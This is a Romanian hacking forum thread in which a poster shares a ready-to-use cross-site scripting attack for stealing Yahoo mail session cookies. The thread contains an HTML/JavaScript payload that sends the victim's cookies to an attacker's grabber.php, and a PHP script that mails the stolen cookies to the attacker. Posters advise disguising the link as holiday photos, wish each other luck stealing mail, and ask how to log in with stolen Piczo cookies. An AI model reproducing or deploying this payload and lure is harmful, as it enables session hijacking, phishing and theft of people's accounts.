Hacking and more...
HaCkinG CulT
|
Nou pe simpatie: oana89 Profile
 | Femeie 25 ani Bucuresti cauta Barbat 25 - 46 ani |
|
|
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
Y2K`Elite MemberDin: 666
Postari: 970
|
|
Cred ca nu mai este nevoie de multe explicatii. Trimiteti cookie script in mailul victimei si aceasta va trebui sa dea un click pe linkul (sau eventual poza pe care vreti sa o bagati linkata) ce duce catre cookie grabber. Nu uitati sa schimbati path catre cookie grabber (php) si adresa de mail din cookie script. Functioneaza pe IE si pe Yahoo Beta. Succes la furat mailuri.
Cookie script
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" > Vezi ca mi-am urcat pozele de la disco aici</a></div> | (vezi ca nu e spatiu intr @ )
Php grabber script:
<?php ## Cookie ## http://www.Nemessis.Info $myemail = $_GET['email']; $cookie = $_GET['cookie']; $today = date("l, F j, Y, g:i a" ; $subject = "Master you have an sucker" ; $message = "undeva-Crewn http://www.undeva-crew.net nnDate: $today nnCookie: n$cookie nundeva-Crewn http://www.undeva-crew.net"; $from = "From: Nemessis<nemessis@undeva-crew.net>rn"; mail($myemail, $subject, $message, $from); echo "<meta http-equiv='refresh' content='1;url=http://www.undeva-crew.net'>"; ?> |
MODIFICATI MAILUL DIN COOKIE SCRIPT (este trecut ca in exemplul meu de mai sus). URCATI PE PAGINA VOASTRA PHP-UL CARE TRIMITE COOKIES FURATE LA VOI IN MAIL . MODIFICATI IN LINKUL DE LA COOKIES EXPLOIT PATH-UL CATRE SITE-UL VOSTRU PE CARE SE AFLA PHP GRABBER (este trecut ca http://site.com/grabber.php in exemplul meu de mai sus).
Credit pentru linkul cu vulnerabilitatea XSS http://realestate.yahoo.com/New_York/Sc ... oomLow=1.0 - DarkProfits (ICQ 50505068) Adaugiri, modificari si filter bypassing pentru a functiona cookie stealer - made by Nemessis
|
|
| |
|
| #3 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
...tare atunci...dar in index.html cum fac ca sa imi deschida grabber.php? si cookie scriptul sub forma de ce il trimit prin email? cum il trimit?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #4 |
HooliganOld School MemberDin: Zion
Postari: 461
|
|
pai cookie iti vine pe mailul care il treci tu in cookie script si grabber.php il urci pe un site , vezi si tu cum numesti cookie scriptul sa fie ceva cat mai convingator . Bafta la furat cookie 
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| |
|
| #5 |
aL3CsMaster of 127.0.0.1
Postari: 139
|
|
si hostu carei il pui tre sa aiba functia mail() nu?
_______________________________________ Hacked By [aL3Cs]
|
|
| |
|
| #6 |
Y2K`Elite MemberDin: 666
Postari: 970
|
|
aL3Cs a scris:
si hostu carei il pui tre sa aiba functia mail() nu? |
exact
|
|
| |
|
| #7 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
@hoo...nu ai inteles ce vroiam sa iti zic...am intrebat ca unde scriu cookie scriptul ala? in mailul pe care il trimit la victima? sau pun cookie scriptul pe un host?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #8 |
HooliganOld School MemberDin: Zion
Postari: 461
|
|
deci cookie script il trimiti la victima si grabber.php il pui pe situl tau
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| |
|
| #9 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
ok ok...am luat niste cookies de pe dc++...sunt de la siteurile piczo....am deschis unul din ele ( [1].txt) si imi arata asta:
he llo pic3.piczo.com/ 1088 2967927168 29812192 466286768 29812092 * intre numere si cuvinte erau patratele...acum intrebarea...cum fac sa intru pe siteul lui de pe piczo cu ajutorul la cookie-ul pe care lam luat? siteul e: www.bosustar.piczo.com pe care lam luat din alt cookie:
jkpopup yes www.bosustar.piczo.com/ 1088 1006230272 29812293 300346768 29812092 * br17777 0 www.bosustar.piczo.com/ 1088 1056230272 29812293 345706768 29812092 * pr17777 2 www.bosustar.piczo.com/ 1088 1709484928 29817132 345806768 29812092 * he llo www.bosustar.piczo.com/ 1088 2907927168 29812192 407496768 29812092 *
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #11 |
HooliganOld School MemberDin: Zion
Postari: 461
|
|
cred ca ala e cookieul de la site si iti treb precum in tutorialul lui imperfect un alt cod dala gen cookie ca sa reusesti sa te loghezi iti treb un cookie editor care il gasesti pe www.mozilla.com dar incerca sa bagi cookiurile pe care le-ai gasit desi nu cred ca merge
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| |
|
| #12 |
|
|
misto Y2K`, acuma sa vad daca inteleg si sa vad ce reusesc
hoo imi dai si mie imaginea de la semnatura ta
|
|
| |
|
| #13 |
Y2K`Elite MemberDin: 666
Postari: 970
|
|
eu a scris:
misto Y2K`, acuma sa vad daca inteleg si sa vad ce reusesc
hoo imi dai si mie imaginea de la semnatura ta |
offtopic: esti fan TNA ?
ontopic : nu stiu daca o mai am ma uit prin pc sa vad 
hack
|
|
| |
|
| #14 |
Y2K`Elite MemberDin: 666
Postari: 970
|
|
deci cum pot face sa trimit cu yahoo codu ?
Code:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" >
Vezi ca mi-am urcat pozele de la disco aici</a></div> |
|
|
| |
|
| #15 |
ShockerSuper ModeratorDin: localhost
Postari: 2084
|
|
Y2K` a scris:
deci cum pot face sa trimit cu yahoo codu ?
Code:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" >
Vezi ca mi-am urcat pozele de la disco aici</a></div> |
|
Pai stai ca sunt confuz... tu ai pus tutorialul si nici nu l-ai citit de nu stii cum se face? Interesant ... 
_______________________________________ ShockingSoft is back Freakz only Comics of the day
|
|
| |
|
| #16 |
|
|
   
_______________________________________ In caz ca nu sti...Getting Laid <> Getting r00t
|
|
| |
|
| #17 |
|
|
interesant !!
_______________________________________ Layout challange : NU DA CLICK !!

|
|
| |
|
| #18 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
serios mai, cum se trimite cookie scriptul prin mail?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #20 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
cum mai vine si aia?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #22 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
ok. tnks
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
| |
|
| #23 |
HooliganOld School MemberDin: Zion
Postari: 461
|
|
faza merge 100% ca am incercat si eu pe mine si a mers dar iti vine mailul mai greu sau cel putin asa a venit la mine
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| |
|
| #24 |
|
|
LoL Ia uite cine mai e pe aici. Domnul Sad_Dreamer si Domnul Shocker. )
Just trespassing guys Take care si nu mai furati prajiturele ca e ilegal 
P.S.- baiatul care ai postat scriptul aici, vezi nenea ca scriptul nu sparge nici un forum, site piczo si daca ma gandesc bine nici conturile de yahoo nu le sparge pentru ca ai acces doar 24 de ore in acele mailuri si nu poti afla parola decat daca o are salvata prin mail omul. Asta doar asa ca sa nu se apuce lumea sa sparga prea multe site-uri piczo si forumuri cu un XSS de yahoo )
_______________________________________ Hackerul de romania (descriere) - http://rstzone.org/forum/viewtopic.php?p=41870#41870
|
|
| |
|